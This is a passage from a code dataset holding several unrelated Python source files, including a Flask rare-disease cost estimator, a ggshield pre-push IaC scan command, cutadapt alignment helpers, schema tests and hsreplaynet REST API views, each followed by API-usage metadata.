另外一欄只是用來計算數量用的\n\n#這樣就可以有每個APP的留言數量了\n\nplt.style.use('classic')\n#reply.plot.box()\nreply1.plot()\nplt.show()\n'''\n\nplt.close('all')", "sub_path": "HW1/stat/Genstatpic.py", "file_name": "Genstatpic.py", "file_ext": "py", "file_size_in_byte": 3313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.reader", "line_number": 14, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "functools.cmp_to_key", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}]} +{"seq_id": "279282562", "text": "from django_comments_xtd.models import XtdComment\nfrom rest_framework import serializers\n\n\nclass CommentSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = XtdComment\n fields = (\n 'user', 'user_name', 'user_email',\n 'comment', 'submit_date',\n 'thread_id', 'parent_id', 'level', 'order', 'followup'\n )\n", "sub_path": "data_commons/serializers/comments.py", "file_name": "comments.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "django_comments_xtd.models.XtdComment", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "352158336", "text": "import settings as setts\nfrom tools.models import MLModel\n\n# Setting ML model\nml_model = MLModel(setts.ml_model, settings=setts)\n\n# Training if needed and get predictions\njson_result = ml_model.generate_prediction_from_values(input_registered=[32, 60],\n input_month=[1, 5],\n input_hour=[1, 2],\n input_weekday=[6, 3])\n", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tools.models.MLModel", "line_number": 5, "usage_type": "call"}, {"api_name": "settings.ml_model", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "109004102", "text": "from flask import Flask, request, render_template, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///rare_disease.db'\r\ndb = SQLAlchemy(app)\r\n\r\n### Models for database tables\r\nclass Disease(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n disease_name = db.Column(db.String(120), unique=True)\r\n disease_desc = db.Column(db.Text)\r\n disease_desc_new = db.Column(db.Text)\r\n disease_desc_old = db.Column(db.Text)\r\n disease_links = db.Column(db.Text)\r\n def __init__(self,disease_name):\r\n self.disease_name = disease_name\r\n def __rept__(self):\r\n return '' % self.disease_name\r\n\r\nclass Therapist(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n therapist_name = db.Column(db.String(120), unique=True)\r\n therapy_desc = db.Column(db.Text)\r\n cost_per_session = db.Column(db.Float(6,2))\r\n def __init__(self,therapist_name):\r\n self.therapist_name = therapist_name\r\n def __rept__(self):\r\n return '' % self.therapist_name\r\n\r\nclass Medicine(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n medicine_name = db.Column(db.String(120), unique=True)\r\n medicine_desc = db.Column(db.Text)\r\n cost_per_unit = db.Column(db.Float(6,2))\r\n def __init__(self,medicine_name):\r\n self.medicine_name = medicine_name\r\n def __rept__(self):\r\n return '' % self.medicine_name\r\n\r\nclass Location(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n location_name = db.Column(db.String(120), unique=True)\r\n therapy_cost_factor = db.Column(db.Float(2 ,2), nullable=False)\r\n medicine_cost_factor = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor1 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor1 = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor2 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor2 = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor3 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor3 = db.Column(db.Float(2, 2), nullable=False)\r\n def __init__(self,location_name):\r\n self.location_name = location_name\r\n def __rept__(self):\r\n return '' % self.location_name\r\n\r\nclass Medicine_req(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n d_id = db.Column(db.Integer, db.ForeignKey('disease.id'), nullable=False)\r\n m_id = db.Column(db.Integer, db.ForeignKey('medicine.id'), nullable=False)\r\n m_req = db.Column(db.Integer, nullable=False)\r\n m_req1 = db.Column(db.Integer, nullable=False)\r\n m_req2 = db.Column(db.Integer, nullable=False)\r\n m_req3 = db.Column(db.Integer, nullable=False)\r\n medicine_req_desc = db.Column(db.Text)\r\n\r\nclass Therapist_req(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n d_id = db.Column(db.Integer, db.ForeignKey('disease.id'), nullable=False)\r\n t_id = db.Column(db.Integer, db.ForeignKey('therapist.id'), nullable=False)\r\n t_req = db.Column(db.Integer, nullable=False)\r\n t_req1 = db.Column(db.Integer, nullable=False)\r\n t_req2 = db.Column(db.Integer, nullable=False)\r\n t_req3 = db.Column(db.Integer, nullable=False)\r\n therapy_req_desc = db.Column(db.Text)\r\n\r\n\r\n### For index page\r\n@app.route('/')\r\ndef index():\r\n diseases = Disease.query.all()\r\n return render_template(\"index.html\", disease=diseases)\r\n\r\n### For query page\r\n@app.route('/query', methods=['POST'])\r\ndef query():\r\n location = Location.query.all()\r\n stage = request.form['stage']\r\n disease = request.form['diagnosis']\r\n diseaseObj = Disease.query.filter(Disease.disease_name == disease).first()\r\n links = diseaseObj.disease_links\r\n print(diseaseObj.disease_name)\r\n if stage == 'Newly Diagnosed':\r\n desciption = diseaseObj.disease_desc_new\r\n stage = 'new'\r\n else:\r\n desciption = diseaseObj.disease_desc_old\r\n stage = 'old'\r\n return render_template(\"query.html\",state = location, disease=disease, stage=stage, desc = desciption, links=links)\r\n\r\n### For result page\r\n@app.route('/result',methods=['POST'])\r\ndef result():\r\n ### Getting data from query form\r\n name=request.form['name']\r\n age = request.form['age']\r\n state = request.form['option']\r\n salary = request.form['salary']\r\n stage = request.form['stage']\r\n disease = request.form['disease']\r\n locationObj = Location.query.filter(Location.location_name == state).first()\r\n\r\n ### Getting cost factors from locations table\r\n\r\n ### Annual\r\n tcf = (locationObj.therapy_cost_factor)\r\n mcf = (locationObj.medicine_cost_factor)\r\n\r\n ### Year2\r\n tcf1 = (locationObj.therapy_cost_factor1)\r\n mcf1 = (locationObj.medicine_cost_factor1)\r\n ### Year3\r\n tcf2 = (locationObj.therapy_cost_factor2)\r\n mcf2 = (locationObj.medicine_cost_factor2)\r\n ### Year4\r\n tcf3 = (locationObj.therapy_cost_factor3)\r\n mcf3 = (locationObj.medicine_cost_factor3)\r\n\r\n ### Get medicine and therapy requirements for the disease selected\r\n disease_id = Disease.query.filter(Disease.disease_name == disease).first().id\r\n\r\n medicine_req = Medicine_req.query.filter(Medicine_req.d_id == disease_id).all()\r\n medicines = []\r\n medicine_units_annual = []\r\n medicine_units_year1 = []\r\n medicine_units_year2 = []\r\n medicine_units_year3 = []\r\n medicine_desc = []\r\n therapy_desc = []\r\n\r\n for medicine in medicine_req:\r\n medicine_units_annual.append(medicine.m_req)\r\n medicine_units_year1.append(medicine.m_req1)\r\n medicine_units_year2.append(medicine.m_req2)\r\n medicine_units_year3.append(medicine.m_req3)\r\n medicines.append(Medicine.query.filter(Medicine.id == medicine.m_id).first())\r\n medicine_desc.append(medicine.medicine_req_desc)\r\n\r\n therapy_req = Therapist_req.query.filter(Therapist_req.d_id == disease_id).all()\r\n therapies = []\r\n therapy_sessions_annual = []\r\n therapy_sessions_year1 = []\r\n therapy_sessions_year2 = []\r\n therapy_sessions_year3 = []\r\n for therapy in therapy_req:\r\n therapist = Therapist.query.filter(Therapist.id == therapy.t_id).first()\r\n if therapist.therapist_name == 'Pediatrician' and int(age) > 18:\r\n continue\r\n therapy_sessions_annual.append(therapy.t_req)\r\n therapy_sessions_year1.append(therapy.t_req1)\r\n therapy_sessions_year2.append(therapy.t_req2)\r\n therapy_sessions_year3.append(therapy.t_req3)\r\n therapies.append(therapist)\r\n therapy_desc.append(therapy.therapy_req_desc)\r\n\r\n ### Get the cost for medicine and therapy for the disease\r\n annual_medicine_cost = 0\r\n year1_medicine_cost = 0\r\n year2_medicine_cost = 0\r\n year3_medicine_cost = 0\r\n annual_therapy_cost = 0\r\n year1_therapy_cost = 0\r\n year2_therapy_cost = 0\r\n year3_therapy_cost = 0\r\n for i in range(len(medicines)):\r\n unit_cost = medicines[i].cost_per_unit\r\n annual_medicine_cost += unit_cost * mcf * medicine_units_annual[i]\r\n year1_medicine_cost += unit_cost * mcf1 * medicine_units_year1[i]\r\n year2_medicine_cost += unit_cost * mcf2 * medicine_units_year2[i]\r\n year3_medicine_cost += unit_cost * mcf3 * medicine_units_year3[i]\r\n\r\n hours_for_therapy = 0\r\n for i in range(len(therapies)):\r\n session_cost = therapies[i].cost_per_session\r\n hours_for_therapy += therapy_sessions_annual[i]\r\n annual_therapy_cost += session_cost * tcf * therapy_sessions_annual[i]\r\n year1_therapy_cost += session_cost * tcf1 * therapy_sessions_year1[i]\r\n year2_therapy_cost += session_cost * tcf2 * therapy_sessions_year2[i]\r\n year3_therapy_cost += session_cost * tcf3 * therapy_sessions_year3[i]\r\n\r\n ### Data for prediction chart\r\n therapy_cost_pred=[int(year1_therapy_cost),int(year2_therapy_cost),int(year3_therapy_cost)]\r\n medicine_cost_pred = [int(year1_medicine_cost), int(year2_medicine_cost), int(year3_medicine_cost)]\r\n\r\n ###Lost opportunity\r\n lost_opportunity = int(int(salary) / 2080 * hours_for_therapy)\r\n\r\n return render_template('result.html', disease = disease, therapies = therapies, medicines = medicines, medicine_data_annual=[int(annual_medicine_cost)], medicine_data_pred=medicine_cost_pred,\r\n therapy_data_annual=[int(annual_therapy_cost)],therapy_data_pred=therapy_cost_pred,\r\n hours_for_therapy=hours_for_therapy,salary=salary,lost_opportunity=lost_opportunity, medicine_desc=enumerate(medicine_desc), therapy_desc=enumerate(therapy_desc),\r\n medicine_desc_comp=enumerate(medicine_desc), therapy_desc_comp=enumerate(therapy_desc))\r\n\r\nif(__name__ == \"__main__\"):\r\n app.run(debug=True)\r\n\r\n", "sub_path": "RareDisease/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8840, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 107, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 107, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 198, "usage_type": "call"}]} +{"seq_id": "93038984", "text": "from pathlib import Path\nfrom typing import Any, List, Sequence\n\nimport click\n\nfrom ggshield.cmd.iac.scan.all import display_iac_scan_all_result, iac_scan_all\nfrom ggshield.cmd.iac.scan.diff import display_iac_scan_diff_result, iac_scan_diff\nfrom ggshield.cmd.iac.scan.iac_scan_common_options import (\n add_iac_scan_common_options,\n update_context,\n)\nfrom ggshield.cmd.utils.common_options import all_option\nfrom ggshield.core.config import Config\nfrom ggshield.core.errors import handle_exception\nfrom ggshield.core.git_hooks.prepush import collect_commits_refs\nfrom ggshield.core.text_utils import display_warning\nfrom ggshield.utils.git_shell import EMPTY_SHA\n\n\n@click.command()\n@click.argument(\"prepush_args\", nargs=-1, type=click.UNPROCESSED)\n@add_iac_scan_common_options()\n@all_option\n@click.pass_context\ndef scan_pre_push_cmd(\n ctx: click.Context,\n prepush_args: List[str],\n exit_zero: bool,\n minimum_severity: str,\n ignore_policies: Sequence[str],\n ignore_paths: Sequence[str],\n scan_all: bool,\n **kwargs: Any,\n) -> int:\n \"\"\"\n Scan as pre-push for IaC vulnerabilities. By default, it will return vulnerabilities added in the pushed commits.\n \"\"\"\n display_warning(\n \"This feature is still in beta, its behavior may change in future versions.\"\n )\n\n try:\n directory = Path().resolve()\n update_context(ctx, exit_zero, minimum_severity, ignore_policies, ignore_paths)\n\n _, remote_commit = collect_commits_refs(prepush_args)\n # Will happen if this is the first push on the branch\n has_no_remote_commit = (\n remote_commit is None or \"~1\" in remote_commit or remote_commit == EMPTY_SHA\n )\n\n if scan_all or has_no_remote_commit:\n result = iac_scan_all(ctx, directory)\n return display_iac_scan_all_result(ctx, directory, result)\n else:\n result = iac_scan_diff(ctx, directory, remote_commit, include_staged=False)\n return display_iac_scan_diff_result(ctx, directory, result)\n except Exception as error:\n config: Config = ctx.obj[\"config\"]\n return handle_exception(error, config.user_config.verbose)\n", "sub_path": "ggshield/cmd/iac/scan/prepush.py", "file_name": "prepush.py", "file_ext": "py", "file_size_in_byte": 2179, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.Context", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 33, "usage_type": "name"}, {"api_name": "ggshield.core.text_utils.display_warning", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.iac_scan_common_options.update_context", "line_number": 44, "usage_type": "call"}, {"api_name": "ggshield.core.git_hooks.prepush.collect_commits_refs", "line_number": 46, "usage_type": "call"}, {"api_name": "ggshield.utils.git_shell.EMPTY_SHA", "line_number": 49, "usage_type": "name"}, {"api_name": "ggshield.cmd.iac.scan.all.iac_scan_all", "line_number": 53, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.all.display_iac_scan_all_result", "line_number": 54, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.diff.iac_scan_diff", "line_number": 56, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.diff.display_iac_scan_diff_result", "line_number": 57, "usage_type": "call"}, {"api_name": "ggshield.core.config.Config", "line_number": 59, "usage_type": "name"}, {"api_name": "ggshield.core.errors.handle_exception", "line_number": 60, "usage_type": "call"}, {"api_name": "click.command", "line_number": 20, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 21, "usage_type": "call"}, {"api_name": "click.UNPROCESSED", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ggshield.cmd.iac.scan.iac_scan_common_options.add_iac_scan_common_options", "line_number": 22, "usage_type": "call"}, {"api_name": "ggshield.cmd.utils.common_options.all_option", "line_number": 23, "usage_type": "name"}, {"api_name": "click.pass_context", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "180875557", "text": "__all__ = [\n 'Aligner',\n 'compare_prefixes',\n 'compare_suffixes',\n]\n\nfrom cutadapt._align import Aligner, compare_prefixes\n\n# flags for global alignment\n\n# The interpretation of the first flag is:\n# An initial portion of seq1 may be skipped at no cost.\n# This is equivalent to saying that in the alignment,\n# gaps in the beginning of seq2 are free.\n#\n# The other flags have an equivalent meaning.\nSTART_WITHIN_SEQ1 = 1\nSTART_WITHIN_SEQ2 = 2\nSTOP_WITHIN_SEQ1 = 4\nSTOP_WITHIN_SEQ2 = 8\n\n# Use this to get regular semiglobal alignment\n# (all gaps in the beginning or end are free)\nSEMIGLOBAL = START_WITHIN_SEQ1 | START_WITHIN_SEQ2 | STOP_WITHIN_SEQ1 | STOP_WITHIN_SEQ2\n\n\ndef compare_suffixes(s1, s2, wildcard_ref=False, wildcard_query=False):\n \"\"\"\n Find out whether one string is the suffix of the other one, allowing\n mismatches. Used to find an anchored 3' adapter when no indels are allowed.\n \"\"\"\n s1 = s1[::-1]\n s2 = s2[::-1]\n _, length, _, _, matches, errors = compare_prefixes(s1, s2, wildcard_ref, wildcard_query)\n return (len(s1) - length, len(s1), len(s2) - length, len(s2), matches, errors)\n\n\n# convenience function (to avoid having to instantiate an Aligner manually)\ndef locate(reference, query, max_error_rate, flags=SEMIGLOBAL, wildcard_ref=False,\n wildcard_query=False, min_overlap=1):\n aligner = Aligner(reference, max_error_rate, flags, wildcard_ref, wildcard_query)\n aligner.min_overlap = min_overlap\n return aligner.locate(query)\n", "sub_path": "src/cutadapt/align.py", "file_name": "align.py", "file_ext": "py", "file_size_in_byte": 1495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cutadapt._align.compare_prefixes", "line_number": 34, "usage_type": "call"}, {"api_name": "cutadapt._align.Aligner", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "380089785", "text": "# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test Suite to ensure legal filing schemas are valid.\n\nThis suite should have at least 1 test for every filing type allowed.\n\"\"\"\nimport copy\n\nimport pytest\n\nfrom registry_schemas import validate\nfrom registry_schemas.example_data import ADDRESS\n\n\ndef test_valid_address():\n \"\"\"Assert that the schema is performing as expected.\"\"\"\n is_valid, errors = validate(ADDRESS, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert is_valid\n\n\ndef test_valid_address_null_region():\n \"\"\"Assert that region is allowed to be null.\"\"\"\n address = copy.deepcopy(ADDRESS)\n address['addressRegion'] = None\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert is_valid\n\n\ndef test_invalid_address():\n \"\"\"Assert that an invalid address fails.\"\"\"\n address = copy.deepcopy(ADDRESS)\n address['streetAddress'] = 'This is a really long string, over the 50 char maximum'\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid\n\n\n@pytest.mark.parametrize('field', [\n 'streetAddress',\n 'addressCity',\n 'addressCountry',\n 'postalCode'\n])\ndef test_invalid_address_missing_field(field):\n \"\"\"Assert that an invalid address fails - missing required field addressRegion.\"\"\"\n address = copy.deepcopy(ADDRESS)\n del address[field]\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid\n", "sub_path": "tests/unit/test_addresses.py", "file_name": "test_addresses.py", "file_ext": "py", "file_size_in_byte": 2283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "registry_schemas.validate", "line_number": 28, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 28, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 40, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 40, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 43, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 55, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 58, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 76, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 76, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "169683960", "text": "from django.test import TestCase\nfrom .models import *\nfrom .serializers import *\n\nclass Recommendation(TestCase):\n\n\tdef setUp(self):\n\t\tself.r_attr = {\n\t\t\t\"label\": \"test_tag\",\n\t\t\t\"description\": \"Tag for unit test\"\n\t\t}\n\n\t\tself.r_comp = Tag.objects.create(**self.r_attr)\n\t\tself.serializer = TagSerializer(instance=self.r_comp, data=self.r_attr)\n\n\tdef test_text_component(self):\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\t\n\t\tself.assertEqual(set(data.keys()), set([\"label\", \"description\"]))\n\t\tself.assertEqual(data[\"label\"], self.r_attr[\"label\"])\n\t\tself.assertEqual(data[\"description\"], self.r_attr[\"description\"])\n\n\tdef test_create_and_update_tag(self):\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\tdata[\"label\"] = \"new_tag\"\n\t\ttemp = self.serializer.create(data)\n\t\tself.assertEqual(temp.label, \"new_tag\")\n\t\tself.assertEqual(temp.description, self.r_attr[\"description\"])\n\n\t\tself.serializer = TagSerializer(instance=temp, data={\"label\": \"new_tag\", \"description\": \"tag for testing\"})\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\ttemp = self.serializer.update(temp, data)\n\t\tself.assertEqual(temp.label, \"new_tag\")\n\t\tself.assertEqual(temp.description, \"tag for testing\")\n", "sub_path": "backend-app/interesthub/recommendation/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1301, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "455294370", "text": "from rest_framework.authentication import SessionAuthentication\nfrom rest_framework.mixins import CreateModelMixin, UpdateModelMixin, RetrieveModelMixin\nfrom rest_framework.generics import CreateAPIView, ListAPIView, RetrieveUpdateDestroyAPIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework.status import HTTP_201_CREATED\nfrom hsreplaynet.accounts.models import AccountClaim\nfrom hsreplaynet.games.models import GameReplay\nfrom hsreplaynet.uploads.models import UploadEvent\nfrom . import serializers\nfrom .authentication import AuthTokenAuthentication, RequireAuthToken\nfrom .models import AuthToken, APIKey\nfrom .permissions import APIKeyPermission, IsOwnerOrReadOnly\n\n\nclass WriteOnlyOnceViewSet(\n\tCreateModelMixin, UpdateModelMixin, RetrieveModelMixin, GenericViewSet\n):\n\tpass\n\n\nclass AuthTokenViewSet(WriteOnlyOnceViewSet):\n\tpermission_classes = (APIKeyPermission, )\n\tqueryset = AuthToken.objects.all()\n\tserializer_class = serializers.AuthTokenSerializer\n\n\nclass APIKeyViewSet(WriteOnlyOnceViewSet):\n\tpermission_classes = (AllowAny, )\n\tqueryset = APIKey.objects.all()\n\tserializer_class = serializers.APIKeySerializer\n\n\nclass CreateAccountClaimView(CreateAPIView):\n\tauthentication_classes = (AuthTokenAuthentication, )\n\tpermission_classes = (RequireAuthToken, )\n\tqueryset = AccountClaim.objects.all()\n\tserializer_class = serializers.AccountClaimSerializer\n\n\tdef create(self, request):\n\t\tclaim, _ = AccountClaim.objects.get_or_create(token=request.auth_token)\n\t\tserializer = self.get_serializer(claim)\n\t\theaders = self.get_success_headers(serializer.data)\n\t\tresponse = Response(serializer.data, status=HTTP_201_CREATED, headers=headers)\n\t\treturn response\n\n\nclass UploadEventViewSet(WriteOnlyOnceViewSet):\n\tauthentication_classes = (AuthTokenAuthentication, SessionAuthentication)\n\tpermission_classes = (RequireAuthToken, APIKeyPermission)\n\tqueryset = UploadEvent.objects.all()\n\tserializer_class = serializers.UploadEventSerializer\n\tlookup_field = \"shortid\"\n\n\nclass GameReplayDetail(RetrieveUpdateDestroyAPIView):\n\tqueryset = GameReplay.objects.live()\n\tserializer_class = serializers.GameReplaySerializer\n\tlookup_field = \"shortid\"\n\tpermission_classes = (IsOwnerOrReadOnly, )\n\n\tdef perform_destroy(self, instance):\n\t\tinstance.is_deleted = True\n\t\tinstance.save()\n\n\nclass GameReplayList(ListAPIView):\n\tqueryset = GameReplay.objects.live().prefetch_related(\"user\", \"global_game__players\")\n\tserializer_class = serializers.GameReplayListSerializer\n\n\tdef check_permissions(self, request):\n\t\tif not request.user.is_authenticated:\n\t\t\tself.permission_denied(request)\n\t\treturn super().check_permissions(request)\n\n\tdef get_queryset(self):\n\t\tqueryset = super().get_queryset()\n\t\tuser = self.request.user\n\t\tif not user.is_staff:\n\t\t\t# For non-staff, only own games are visible\n\t\t\tqueryset = queryset.filter(user=user)\n\t\t# Allow filtering on username key\n\t\tusername = self.request.query_params.get(\"username\", None)\n\t\tif username:\n\t\t\tqueryset = queryset.filter(user__username=username)\n\t\treturn queryset\n", "sub_path": "hsreplaynet/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 18, "usage_type": "name"}, {"api_name": "permissions.APIKeyPermission", "line_number": 24, "usage_type": "name"}, {"api_name": "models.AuthToken.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "models.AuthToken.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.AuthToken", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 30, "usage_type": "name"}, {"api_name": "models.APIKey.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "models.APIKey.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.APIKey", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 35, "usage_type": "name"}, {"api_name": "authentication.AuthTokenAuthentication", "line_number": 36, "usage_type": "name"}, {"api_name": "authentication.RequireAuthToken", "line_number": 37, "usage_type": "name"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim", "line_number": 38, "usage_type": "name"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects.get_or_create", "line_number": 42, "usage_type": "call"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 45, "usage_type": "call"}, {"api_name": 